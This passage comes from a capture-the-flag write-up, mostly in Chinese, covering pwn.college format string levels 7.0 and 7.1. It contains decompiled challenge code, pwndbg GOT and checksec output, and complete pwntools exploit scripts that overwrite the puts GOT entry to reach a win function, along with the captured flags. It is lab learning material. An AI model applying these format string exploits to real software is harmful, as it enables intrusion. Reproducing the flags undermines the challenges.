target.sendafter(b"Send your data!", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{o3IDJsXjzJ3CBMBZz_66rdU2oQR.ddjM0MDL5cTNxgzW}
Level 7.0
- Category: Pwn
Use a format string exploit to overwrite a got entry.
36 collapsed lines
int __fastcall main(int argc, const char **argv, const char **envp){ size_t v3; // rax size_t v4; // rax int fd; // [rsp+2Ch] [rbp-14h] const char **i; // [rsp+30h] [rbp-10h] const char **j; // [rsp+38h] [rbp-8h]
setvbuf(stdin, 0LL, 2, 0LL); setvbuf(_bss_start, 0LL, 2, 0LL); puts("###"); printf("### Welcome to %s!\n", *argv); puts("###"); putchar(10); if ( argc <= 0 ) __assert_fail("argc > 0", "<stdin>", 0xA0u, "main"); puts( "In this challenge, you will be performing attack against the old and famous vulnerability:\n" "\"format string vulnerability\". This challenge reads in some bytes and print the\n" "input as the format using `printf` in different ways(depending on the specific challenge\n" "configuration). Different challenges have different protections on. ROP may be needed in\n" "some challenges. Have fun!"); puts("To ensure that you are ROPing, rather than doing other tricks, this"); puts("will sanitize all environment variables and arguments and close all file"); puts("descriptors > 2,"); putchar(10); for ( fd = 3; fd <= 9999; ++fd ) close(fd); for ( i = argv; *i; ++i ) { v3 = strlen(*i); memset((void *)*i, 0, v3); } for ( j = envp; *j; ++j ) { v4 = strlen(*j); memset((void *)*j, 0, v4); } func(); puts("### Goodbye!"); return 0;}
15 collapsed lines
unsigned __int64 func(){ char v1[1032]; // [rsp+60h] [rbp-410h] BYREF unsigned __int64 v2; // [rsp+468h] [rbp-8h]
v2 = __readfsqword(0x28u); puts("In this challenge, you can perform format string attack for infinite times"); puts("You can use the the attack to leak information and prepare your payload"); puts("After your payload is ready, send \"END\" to exit from the while loop"); puts("And hopefully your payload can be triggered :)\n"); memset(v1, 0, 0x400uLL); puts("You can use `checksec` command to check the protection of the binary."); while ( 1 ) { puts("\nNow, the program is waiting for your input."); puts("If your input contains \"END\", the program exits from the while loop before triggering the vulnerability:"); memset(v1, 0, 0x400uLL); memset(v1, 0, 0x400uLL); if ( (int)read(0, v1, 0x3FFuLL) <= 0 || strstr(v1, "END") ) break; puts("Show me what you got :P"); printf(v1); } return __readfsqword(0x28u) ^ v2;}
并没有什么特别的地方,只要 read
返回 > 0
,并且输入中不包含 END
程序就可以无限次触发格式化字符串漏洞。而我们的目标是执行下面这个 win
void __noreturn win(){ int v0; // eax
puts("You win! Here is your flag:"); v0 = open("/flag", 0); sendfile(1, v0, 0LL, 0x400uLL); exit(0);}
检查保护措施,发现没开 PIE,看到这个就开心,因为之后利用起来会比较轻松……有 Canary,但因为格式化字符串漏洞的存在,我们可以直接忽略掉它。重点在于这个程序是 Partial RELRO 的,这个 RELRO 级别的 GOT 表是可写的,注意到我们触发格式化字符串漏洞之后程序返回到 main
还会调用一次 puts
函数(对于 7.1 是这样的,但对于 7.0 这个情况,事实上我们会在循环体内再次出发 puts
,所以 7.0 可以不输入 END
),那我们只要通过格式化字符串漏洞把 puts
的 GOT 表内容篡改为 win
的地址就好了,篡改后再次调用 puts
就会执行 win
需要注意的点是由于 win
内部还有一个 puts
pwndbg> checksecFile: /home/cub3y0nd/Projects/pwn.college/babyfmt_level7.0Arch: amd64RELRO: Partial RELROStack: Canary foundNX: NX enabledPIE: No PIE (0x400000)SHSTK: EnabledIBT: EnabledStripped: Nopwndbg> gotFiltering out read-only entries (display them with -r or --show-readonly)
State of the GOT of /home/cub3y0nd/Projects/pwn.college/babyfmt_level7.0:GOT protection: Partial RELRO | Found 15 GOT entries passing the filter[0x404018] putchar@GLIBC_2.2.5 -> 0x7502eb8c8310 (putchar) ◂— endbr64[0x404020] puts@GLIBC_2.2.5 -> 0x7502eb8c6360 (puts) ◂— endbr64[0x404028] strlen@GLIBC_2.2.5 -> 0x7502eb9b3040 ◂— endbr64[0x404030] __stack_chk_fail@GLIBC_2.4 -> 0x401060 ◂— endbr64[0x404038] setbuf@GLIBC_2.2.5 -> 0x7502eb8cdb30 (setbuf) ◂— endbr64[0x404040] printf@GLIBC_2.2.5 -> 0x7502eb89de00 (printf) ◂— endbr64[0x404048] __assert_fail@GLIBC_2.2.5 -> 0x401090 ◂— endbr64[0x404050] memset@GLIBC_2.2.5 -> 0x7502eb9b0cc0 ◂— endbr64[0x404058] close@GLIBC_2.2.5 -> 0x7502eb94be60 (close) ◂— endbr64[0x404060] read@GLIBC_2.2.5 -> 0x7502eb950a20 (read) ◂— endbr64[0x404068] sendfile@GLIBC_2.2.5 -> 0x4010d0 ◂— endbr64[0x404070] setvbuf@GLIBC_2.2.5 -> 0x7502eb8c6b10 (setvbuf) ◂— endbr64[0x404078] open@GLIBC_2.2.5 -> 0x4010f0 ◂— endbr64[0x404080] exit@GLIBC_2.2.5 -> 0x401100 ◂— endbr64[0x404088] strstr@GLIBC_2.2.5 -> 0x401110 ◂— endbr64pwndbg> i fun winAll functions matching regular expression "win":
Non-debugging symbols:0x0000000000401540 win0x00007502eb8cda20 rewind0x00007502eb8e2330 __pthread_unwind_next0x00007502eb927940 rewinddir0x00007502eb95d260 __libc_unwind_link_get
所以这时候没 PIE 的爽就体现出来了,不需要想办法泄漏 GOT 表,已经被看光光了,指哪打哪 LOL
20:49,啊啊啊啊啊写 0 真麻烦,不干了!
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level7.0"HOST, PORT = "localhost", 1337
gdbscript = """b *func+280c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(position): puts_got = 0x404020 parts = [0x1554, 0x0040, 0x0000, 0x0000]
align_stack = b"a" * 3 written_chars = len(align_stack) % 0x10000
fmtstr_parts = []
for idx, target_byte in enumerate(parts): padding = (target_byte - written_chars) % 0x10000
fmtstr_parts.append( f"%{padding}x%{position + idx}$hn" if padding > 0 else f"%{position + idx}$hn" )
written_chars += padding
fmtstr = "".join(fmtstr_parts).encode("ascii") + b"\x00" addresses = [puts_got + (i * 0x2) for i in range(len(parts))]
return flat( align_stack, fmtstr, *addresses, )
def attack(target): try: payload = construct_payload(24)
target.sendafter(b"vulnerability:", payload)
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{Ux3-i0zQW7ZkTY5X_RLl2eIH1Fb.dhjM0MDL5cTNxgzW}
Level 7.1
- Category: Pwn
Use a format string exploit to overwrite a got entry.
参见 Level 7.0。
from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./babyfmt_level7.1"HOST, PORT = "localhost", 1337
gdbscript = """b *func+198c"""
@contextmanagerdef launch(local=True, debug=False, aslr=False, argv=None, envp=None): target = None
try: if local: global elf
elf = ELF(FILE) context.binary = elf
target = ( gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) if debug else process([elf.path] + (argv or []), env=envp) ) else: target = remote(HOST, PORT) yield target finally: if target: target.close()
def construct_payload(position): puts_got = 0x404020 parts = [0x1351, 0x0040, 0x0000, 0x0000]
align_stack = b"a" * 3 written_chars = len(align_stack) % 0x10000
fmtstr_parts = []
for idx, target_byte in enumerate(parts): padding = (target_byte - written_chars) % 0x10000
fmtstr_parts.append( f"%{padding}x%{position + idx}$hn" if padding > 0 else f"%{position + idx}$hn" )
written_chars += padding
fmtstr = "".join(fmtstr_parts).encode("ascii") + b"\x00" addresses = [puts_got + (i * 0x2) for i in range(len(parts))]
return flat( align_stack, fmtstr, *addresses, )
def attack(target): try: payload = construct_payload(72)
target.sendafter(b"Have fun!", payload) target.sendline(b"END")
response = target.recvall(timeout=3)
if b"pwn.college{" in response: return True except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): try: with launch(debug=False) as target: if attack(target): log.success("Attack completed successfully.") else: log.failure("Attack did not yield a flag.") except Exception as e: log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{s0yYpAm36BLU2Mp5PhbvBmPuc-3.dljM0MDL5cTNxgzW}